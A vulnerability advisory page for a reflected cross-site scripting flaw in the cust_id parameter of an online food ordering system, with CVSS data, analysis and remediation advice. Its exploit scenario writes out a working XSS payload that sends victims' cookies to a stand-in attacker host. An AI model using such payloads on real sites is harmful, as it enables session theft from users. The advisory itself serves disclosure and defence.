EUVD-2026-17253Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
6DescriptionCVE.org
A vulnerability was identified in code-projects Online Food Ordering System 1.0. Affected is an unknown function of the file /form/order.php of the component Order Module. Such manipulation of the argument cust_id leads to cross site scripting. The attack may be performed from remote. The exploit is publicly available and might be used.
AnalysisAI
Reflected cross-site scripting (XSS) in code-projects Online Food Ordering System 1.0 allows unauthenticated remote attackers to inject malicious scripts via the cust_id parameter in /form/order.php, exploitable through user interaction (UI required). Publicly available exploit code exists; the vulnerability carries CVSS 4.3 (low severity) but poses reputational and user session hijacking risks typical of XSS attacks in e-commerce contexts.
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Vulnerability AssessmentAI
| Risk Assessment | Despite the CVSS 4.3 score indicating low severity, this XSS vulnerability merits moderate real-world attention. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker crafts a malicious URL containing JavaScript payload in the cust_id parameter (e.g., /form/order.php?cust_id=<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>) and sends it to a victim customer via email, messaging, or by embedding it in a compromised advertisement. When the victim clicks the link while logged into their food ordering account, the injected script executes in their browser context, stealing session cookies or redirecting them to a phishing site. … |
| Remediation | Immediate remediation requires input validation and output encoding: all user-supplied input (especially cust_id) must be sanitized using parameterized queries or prepared statements for any database operations, and HTML-encoded or JavaScript-escaped before insertion into the page response. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Authentication bypass in Discuz! X5.0 releases 20260320 through 20260501 allows unauthenticated remote attackers to acce
Authenticated remote code execution in Discuz! X5.0 releases 20260320 through 20260501 allows administrators to chain a
Unauthenticated PHP Object Injection in the Happyforms WordPress plugin (versions <= 1.26.13) allows remote attackers to
Unauthenticated PHP Object Injection in the Broadcast Live Video WordPress plugin (versions prior to 7.1.3) allows remot
Unauthenticated PHP object injection in the WordPress plugin 'Integration for Keap/Infusionsoft and Contact Form 7, WPFo
Share
External POC / Exploit Code
Leaving vuln.today